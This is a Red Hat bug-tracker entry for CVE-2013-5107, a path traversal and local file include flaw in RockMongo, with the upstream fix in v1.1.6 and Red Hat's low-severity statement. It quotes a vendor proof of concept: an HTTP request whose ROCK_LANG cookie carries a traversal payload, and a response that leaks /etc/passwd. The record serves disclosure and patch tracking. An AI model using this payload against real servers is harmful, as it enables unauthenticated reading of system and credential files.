Bug 1043654 (CVE-2013-5107)

Summary: CVE-2013-5107 RockMongo: directory traversal vulnerability
Product: [Other] Security Response Reporter: Kurt Seifried <kseifried>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED WONTFIX QA Contact:
Severity: low Docs Contact:
Priority: low    
Version: unspecifiedCC: ccoleman, dmcphers, jialiu, jrusnack, lmeyer, mmcgrath
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2014-09-07 05:03:20 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 1043673    
Bug Blocks: 1043672    

Description Kurt Seifried 2013-12-16 20:31:45 UTC 
Damian Profancik of Trustwave SpiderLabs reports:

RockMongo is vulnerable to a Local File Include and Path Traversal
Vulnerability. Specifically, modifying the the ROCK_LANG cookie.

This vulnerability does not require an attacker to be authenticated prior
to performing the exploit. This is because the ROCK_LANG cookie is
processed and included prior to logging in to the application. Below is a
proof of concept for exploiting this vulnerability:

Example 1 (Tested on RockMongo v1.1.2):

#Request

GET /index.php?action=login.index&host=0 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ROCK_LANG=../../../../etc/passwd%00
Connection: keep-alive


#Response

HTTP/1.1 200 OK
Date: Mon, 10 Jun 2013 13:32:57 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.9
Set-Cookie: PHPSESSID=mla2qlmqa810h07qn6bie8qk77; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4897
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<title>RockMongo</title>
<script language="javascript" src="js/jquery-1.4.2.min.js"></script>
<script language="javascript" src="js/jquery.textarea.js"></script>
<link rel="stylesheet" href="themes/default/css/global.css" type="text/css" media="all"/>
<script language="javascript">
$(function () {
$(document).click(window.parent.hideMenus);
if ($("textarea").length > 0) {
$("textarea").tabby();
}
});
</script>
</head>
<body>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
landscape:x:103:108::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
statd:x:105:65534::/var/lib/nfs:/bin/false
postfix:x:106:114::/var/spool/postfix:/bin/false
ntop:x:107:116::/var/lib/ntop:/bin/false
mongodb:x:108:65534::/home/mongodb:/bin/false
mysql:x:109:118:MySQL Server,,,:/nonexistent:/bin/false
ntp:x:110:119::/home/ntp:/bin/false
+::::::
<script type="text/javascript">
var showMore = 0;
...

External references:
https://www.trustwave.com/spiderlabs/advisories/TWSL2013-026.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5107
Comment 2 Kurt Seifried 2014-07-04 07:08:39 UTC 
This was fixed upstream:

http://rockmongo.com/wiki/changeLog

v1.1.6 - 2014-06-05

Fixed cookie vulnerability as reported in CVE-2013-5107 (thanks for synthomat)
Comment 3 Kurt Seifried 2014-11-30 19:51:38 UTC 
Statement:

This issue affects the versions of the mongo cartridge as shipped with Red Hat OpenShift Enterprise Linux 2. Red Hat Product Security has rated this issue as having Low security impact. A future update may address this issue. For additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/. Additionally OpenShift uses a strong file permission and SELinux permission model minimizing the amount of data that can be viewed.